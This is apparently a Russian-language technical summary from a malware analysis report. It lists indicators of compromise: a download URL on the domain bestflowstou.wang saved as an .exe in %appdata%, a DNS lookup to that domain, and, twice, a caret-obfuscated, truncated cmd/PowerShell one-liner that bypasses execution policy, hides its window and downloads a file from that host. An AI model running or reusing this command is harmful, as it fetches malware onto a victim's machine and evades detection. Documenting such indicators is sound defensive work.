Техническая информация
- http://bestflowstou.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWE^rsH^e^ll^.^exE -E^Xe^C^Ut^IoN^pOL^iC^y^ b^yPaSs -^N^o^prOfi^Le ^-winDOW^S^Ty^L^e HID^dEN^ (n^ew-ob^JECt sY^steM.NET.^We^bClien^T^).Do^WnlOaDFiL^E('http://bestflowstou.wang/s...
- DNS ASK be####owstou.wang
- '<SYSTEM32>\cmd.exe' /c "pOWE^rsH^e^ll^.^exE -E^Xe^C^Ut^IoN^pOL^iC^y^ b^yPaSs -^N^o^prOfi^Le ^-winDOW^S^Ty^L^e HID^dEN^ (n^ew-ob^JECt sY^steM.NET.^We^bClien^T^).Do^WnlOaDFiL^E('http://bestflowstou.wang/s...' (со скрытым окном)